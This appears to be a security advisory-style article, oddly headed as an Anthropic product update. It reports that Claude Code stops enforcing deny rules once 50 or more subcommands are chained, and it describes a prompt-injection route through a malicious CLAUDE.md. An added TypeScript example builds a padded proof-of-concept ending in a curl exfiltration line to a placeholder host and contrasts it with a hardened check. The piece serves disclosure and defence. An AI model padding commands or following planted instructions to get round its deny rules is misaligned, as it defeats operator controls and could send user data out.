product update | Anthropic

Claude Code bypasses safety rules after 50 chained commands, enabling prompt injection attacks

TL;DR

Claude Code stops enforcing its deny rules, such as a rule blocking curl, when the denied command is preceded by 50 or more chained subcommands, according to security firm Adversa. The cause is a hard-coded MAX_SUBCOMMANDS_FOR_SECURITY_CHECK limit of 50 in the source code; beyond that limit the permission check falls back to asking the user rather than enforcing deny rules.



Anthropic's Claude Code will ignore its security deny rules when given a sufficiently long chain of subcommands, letting an attacker bypass protections against risky operations such as outbound network requests. Security firm Adversa discovered the vulnerability following the leak of Claude Code's source code.

The Technical Issue

Claude Code uses deny rules configured in ~/.claude/settings.json to block access to potentially dangerous tools. For example, administrators can prevent curl execution with:

{ "deny": ["Bash(curl:*)"] }

However, the source file bashPermissions.ts contains a hard-coded limit, MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. Once a command chain runs past 50 security-relevant subcommands, the checker stops evaluating deny rules against the remaining subcommands and instead falls back to asking the user for permission.

The code references an internal Anthropic issue (CC-643), with a comment noting that 50 was considered "a generous allowance for legitimate usage." This assumption held true for human-authored commands but failed to account for AI-generated attack chains.

Proof of Concept

Adversa demonstrated the vulnerability with a simple attack: a single bash command chaining 50 no-op "true" subcommands followed by a curl command. Instead of denying curl outright, Claude Code prompted the user for authorization, so the configured deny rule never fired.

In a realistic attack the payload is delivered by prompt injection: a malicious CLAUDE.md file instructs the agent to generate pipelines of 50 or more subcommands, disguised as a legitimate build process, with the denied command at the end.

Real-World Impact

The vulnerability poses practical risks in two scenarios:

  1. Developer approval workflows: When developers run with automatic approval (--dangerously-skip-permissions mode) or reflexively accept prompts after a long session, the bypass succeeds without anyone noticing that a denied command was executed.

  2. CI/CD pipelines: When Claude Code runs in non-interactive mode without human oversight, injected commands bypass security controls entirely.

Status and Fix

Anthropic has already developed a fix internally, built on the tree-sitter parser, that properly validates command chains, but that parser is not shipped in public builds. Adversa notes that a single-line change at line 2174 of bashPermissions.ts, switching the fallback "behavior" from "ask" to "deny", would close this particular bypass immediately.
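To make the failure mode concrete, here is an added example (written for this article, not code from the leaked bashPermissions.ts) that models a simplified permission check with a subcommand cap in both its vulnerable shape, where exceeding the cap falls back to "ask", and the hardened shape Adversa describes, where the fallback is "deny". The deny-rule syntax Bash(curl:*) and the constant's name and value come from the article; the function names, the way subcommands are split on shell control operators, the exact boundary (more than 50) and the use of "ask" as the default for unlisted commands are assumptions for illustration.

```typescript
// Added example: a simplified model of a shell permission check with a subcommand
// cap. Not Claude Code's own implementation; names and splitting logic are assumed.

type Decision = "allow" | "ask" | "deny";

// Constant name and value as reported for bashPermissions.ts.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

// Split a command line on the control operators &&, ||, ; and | into subcommands.
// Assumed simplification: no awareness of quoting or escaping. A real checker needs
// a proper shell parser (the article says the internal fix is built on tree-sitter).
export function splitSubcommands(command: string): string[] {
  return command
    .split(/\s*(?:&&|\|\||;|\|)\s*/)
    .map((s) => s.trim())
    .filter((s) => s.length > 0);
}

// Parse deny rules of the form Bash(prog:*) into the set of denied program names.
export function deniedPrograms(denyRules: string[]): Set<string> {
  const progs = new Set<string>();
  for (const rule of denyRules) {
    const m = /^Bash\(([^:)]+):\*\)$/.exec(rule);
    if (m) progs.add(m[1]);
  }
  return progs;
}

function matchesDeny(sub: string, denied: Set<string>): boolean {
  const prog = sub.split(/\s+/)[0];
  return denied.has(prog);
}

// Vulnerable shape: once the chain exceeds the cap, the checker gives up and
// returns "ask", so deny rules are never consulted for the trailing subcommand.
export function checkVulnerable(command: string, denyRules: string[]): Decision {
  const subs = splitSubcommands(command);
  if (subs.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) return "ask";
  const denied = deniedPrograms(denyRules);
  return subs.some((s) => matchesDeny(s, denied)) ? "deny" : "ask";
}

// Hardened shape: deny rules are applied to every subcommand before any cap is
// considered, and a chain too long to analyse is denied rather than prompted for.
export function checkHardened(command: string, denyRules: string[]): Decision {
  const subs = splitSubcommands(command);
  const denied = deniedPrograms(denyRules);
  if (subs.some((s) => matchesDeny(s, denied))) return "deny";
  if (subs.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) return "deny";
  return "ask";
}

// Build the proof-of-concept shape: n no-op `true` subcommands, then the real one.
export function buildPadding(n: number, tail: string): string {
  return [...Array.from({ length: n }, () => "true"), tail].join(" && ");
}

// Constructed sample policy and payload (the URL is a placeholder).
export const DENY_RULES = ["Bash(curl:*)"];
export const POC_COMMAND = buildPadding(50, "curl https://example.invalid/exfil");

console.log("plain curl, vulnerable:", checkVulnerable("curl https://example.invalid", DENY_RULES));
console.log("padded curl, vulnerable:", checkVulnerable(POC_COMMAND, DENY_RULES));
console.log("padded curl, hardened:", checkHardened(POC_COMMAND, DENY_RULES));
```

The point the model makes is that the cap is harmless as long as the failure direction is "deny": a chain the checker cannot afford to analyse should be refused, not handed to the user as a prompt that looks like any other. Note that the padding need not be `true` in this model; any subcommand that does not match a deny rule works, which is why the CLAUDE.md injection can dress the chain up as a build step.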

Anthropic did not respond to requests for comment.

What This Means

The vulnerability highlights a systematic problem: security limits sized around human behavior fail when AI-generated input can trivially exceed the threshold. The 50-subcommand cap was chosen as a generous allowance for legitimate, human-authored commands, but an AI agent can emit arbitrarily long command chains in a single turn, and an attacker who controls the prompt can make it do so.

While the fix is straightforward, the discovery raises broader questions about deploying Claude Code in automated environments where its security assumptions may not hold. Until Anthropic patches this issue, organizations running Claude Code in CI/CD or other unattended contexts should treat deny rules as a policy layer only, not as technical enforcement, and put the real controls outside the agent: a sandbox or network policy that blocks outbound requests regardless of what the agent decides to run.
